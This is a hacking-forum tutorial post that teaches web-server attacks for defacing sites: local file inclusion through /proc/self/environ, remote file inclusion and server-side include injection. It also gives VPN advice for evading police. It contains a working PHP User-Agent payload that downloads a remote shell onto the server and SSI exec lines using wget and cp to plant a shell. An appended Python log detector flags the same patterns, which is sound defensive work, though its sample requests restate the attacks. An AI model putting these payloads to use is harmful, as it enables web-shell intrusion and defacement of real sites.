    Tutorial Advanced Exploitation Techniques


    Post by Admin Thu Dec 25, 2014 3:46 pm

    Table of Contents
    Chapter I: Recon
    Chapter II: Getting the tools ready
    Chapter III: Getting your ass safe
    Chapter IV: Local File Inclusion
    Chapter V: Remote File Inclusion
    Chapter VI: Server Side Inclusion
    Chapter VII: Last word


    Chapter I: Recon

    Alright, imagine this: "You are a Navy SEAL, ready to strike Osama bin Laden's house. But... you haven't prepared any strategy or plan, you haven't found any flaw in the house's security." I bet you could tell me what's going to happen with the mission. COMPLETE FAILURE.
    Always plan, plan and don't forget... plan. Let me explain to you briefly what I mean by planning. The art of planning is basically gathering information about your target. The information I always collect is: the OS, the CMS it is running, and whether there are any open ports. Then, after I have gathered that information, I usually perform a Paros Proxy scan on the site. Basically all it does is scan the site for vulnerabilities and make up a fancy report.
    If you want to download and use Paros for yourself, be my guest.
    Alright now... I assume that you have the following information:
    an idea of which ports are open on the target, the operating system, the possible CMS the server is running (not necessary) and your Paros Proxy report. That's basically all the information you need to determine which kind of attack you are going to use against the target.

    Chapter II: Tools

    Like every job there is, you will need tools.
    We hackers have a very small amount of tools necessary to complete our main goal, which is exploiting that one website you wish to deface.
    Alright, throughout this tutorial we are not going to use fancy tools etc.
    Instead we will be using these key tools: your brain, your hands and, last but certainly not least... Firefox.
    Make sure that you have either HTTP Headers or Tamper Data installed as a Firefox plugin.


    Chapter III: Safety

    In a world where people hack targets, you have another group of people. I bet you feel this coming... the police.
    Trust me on this one: once you start hacking big sites, the police will try to get your ass. But not when we are around. We can outsmart the police by using a VPN. VPN stands for Virtual Private Network. Basically it's a server you can connect to, which will intercept all your packets and make them go through their server. All that it does is hide your real IP.
    Some free VPNs are: Cyberghost, VPNreactor and nProx.
    Once you move on to the bigger sites, I would highly recommend getting a paid VPN like vpntunnel or anonine.


    Chapter IV: Local File Inclusion

    Most of you have probably heard about this method once or twice. This is the so-called "LFI" exploitation method.
    LFI can occur on sites with this extension:

    Code:

    [You must be registered and logged in to see this link.]


    When you perform an LFI attack you attempt to bypass the server directories to end up in the proc/self/environ directory. This can be done with ../../../proc/self/environ or if the ../. Useless, you say? WELL, I couldn't disagree more with you on that one. You see, at first sight proc/self/environ seems like a bunch of shit.
    It will look something like this:

    Code:

    TMPDIR=/var/chroot/home/content/23/8340423/tmp
    PHPRC=/var/chroot/home/content/23/8340423/html
    TEMP=/var/chroot/home/content/23/8340423/tmp
    PHP_FCGI_CHILDREN=0
    PATH=/usr/local/bin:/usr/bin:/bin
    PWD=/web/cgi-bin
    SHLVL=0
    RAILS_ENV=production
    SPI=TRUE
    TMP=/var/chroot/home/content/23/8340423/tmp
    PHP_FCGI_MAX_REQUESTS=100000


    But there is something really cool we can do with this.
    We can spawn a shell through this directory...
    Now I've got your attention, right? Good. To spawn a shell we simply open up our Tamper Data and reload the page while we are tampering.
    Once you see a little message pop up, click Tamper Data.
    Now we will notice a little User-Agent tab.
    In there we will type the following code:

    PHP Code:


    <?php
    $file = fopen("shellname.php", "w+");
    $stream = fopen("Link you shell here/shell.txt", "r");
    while (!feof($stream)) {
        $shell .= fgets($stream);
    }
    fwrite($file, $shell);
    fclose($file);
    ?>



    Thanks to Legit for that code. It works better than mine with system();.
    Now once you have done that, click the submit button and your shell should be spawned. To check if it worked go to [You must be registered and logged in to see this link.] and voila.


    Chapter V: Remote File Inclusion

    I'm not very glad to say it, but this is one of the good exploit methods that has died. There are almost no websites that have this vulnerability. That's because it's so easy to fix and yet so harmful.
    I will explain the so-called "RFI" to you briefly.
    RFI, or remote file inclusion, is a technique where you exploit the include() function.
    RFI and LFI are quite similar, but there's a catch. "Remote" refers to using an external site to upload your shell and "Local" refers to uploading your shell using the same site.
    For example: a site includes PHP scripts in an unprotected manner.
    A little bit like this:

    PHP Code:


    <?php
    $color = 'blue';
    if (isset($_GET['COLOR'])) {
        $color = $_GET['COLOR'];
    }
    include($color . '.php');
    ?>



    Now to exploit this we will execute the following command:

    Code:

    [You must be registered and logged in to see this link.]


    Now you are wondering... why the hell did he use a .txt shell?
    PHP automatically transfers .txt > .php, which will result in a nice shell to own/deface the website.

    Chapter VI: Server Side Inclusion

    Okay, now we move on to the "harder" methods.
    Server Side Inclusion, or SSI, is an advanced technique that exploits vulnerabilities in the HTML code.
    All that this means is that you inject script into HTML forms and that it will result in spawning a shell or doing something worse.
    SSI can only be performed on a few pages. Only pages with .shtml and .shtm are affected by this. These pages are 100% injectable. There is something else to keep in mind: SSI will also work on normal pages, but ONLY when the input is not filtered.
    For example, we have a little textbox which is vulnerable to SSI.
    We can do some nice little commands here, for example:

    Code:

    <!--#exec cmd="cd \admin\dir" -->
    <!--#exec cmd="wget [You must be registered and logged in to see this link.]" -->


    I will explain these 2 commands to you for a moment.
    The first command lets you browse directories that you can't access without administrator privileges. The second command lets you download your shell onto the website (this is the shit we are interested in).
    Then the only thing left for you to do is to locate your file by executing this command:

    Code:

    <!--#exec cmd="cp folderlocation/shellname.txt folderlocation/yourshellname.php" -->

    This basically finds your shell.txt, converts it to PHP and places it in the directory of your choice.


    Chapter VII: Last things

    Well, this was my little tutorial regarding uncommon forms of attack.
    I hope you have learned something from it and I hope to hear your personal experiences with this.
    If this helped you, please leave any form of thank you. It's highly appreciated.
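    Added example, not part of the original post: a small Python detector that runs the three request patterns described in Chapters IV, V and VI (traversal to proc/self/environ with PHP tags in the User-Agent, a parameter pointing at a remote URL, and an SSI exec directive in form input) over Apache combined-format access-log lines. The log lines, IP addresses and rule names are constructed for this example; only the patterns come from the post.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format, User-Agent last); not real traffic.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [25/Dec/2014:15:46:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Dec/2014:15:46:02 +0000] "GET /index.php?page=../../../proc/self/environ HTTP/1.1" 200 2048 "-" "<?php echo 1; ?>"',
    '203.0.113.9 - - [25/Dec/2014:15:46:03 +0000] "GET /index.php?COLOR=http://198.51.100.7/shell.txt HTTP/1.1" 200 96 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Dec/2014:15:46:04 +0000] "POST /guestbook.shtml?msg=%3C!--%23exec%20cmd%3D%22ls%22--%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One rule per technique in the post; all run on the decoded request path except
# php_in_user_agent, which runs on the User-Agent header (where Chapter IV puts the PHP).
RULES = {
    "lfi_proc_environ": re.compile(r'(?:\.\./|\.\.\\).*proc/self/environ', re.I),  # Chapter IV
    "php_in_user_agent": re.compile(r'<\?php', re.I),                             # Chapter IV
    "rfi_remote_url": re.compile(r'[?&][^=&]+=(?:https?|ftp)://', re.I),          # Chapter V
    "ssi_exec": re.compile(r'<!--\s*#(?:exec|include)\b', re.I),                  # Chapter VI
}

def parse_line(line):
    """Split one combined-format log line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return the names of the rules that fire for one parsed request."""
    # Decode twice: double-encoded payloads are a common way past single-pass filters.
    path = unquote(unquote(entry["path"]))
    hits = [name for name, rx in RULES.items()
            if rx.search(entry["ua"] if name == "php_in_user_agent" else path)]
    # Traversal to /proc/self/environ plus PHP tags in the User-Agent is exactly the
    # combination Chapter IV describes, so it gets its own higher-confidence alert.
    if "lfi_proc_environ" in hits and "php_in_user_agent" in hits:
        hits.append("environ_code_injection")
    return hits

def scan(lines):
    """Map each suspicious request path to its alerts; clean/unparseable lines are skipped."""
    alerts = {}
    for line in lines:
        entry = parse_line(line)
        if entry and (hits := classify(entry)):
            alerts[entry["path"]] = hits
    return alerts
```

    Calling scan(SAMPLE_LOG_LINES) flags the last three sample requests and leaves the ordinary page=about request alone; in practice the same rules would be fed from the web server's access log.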


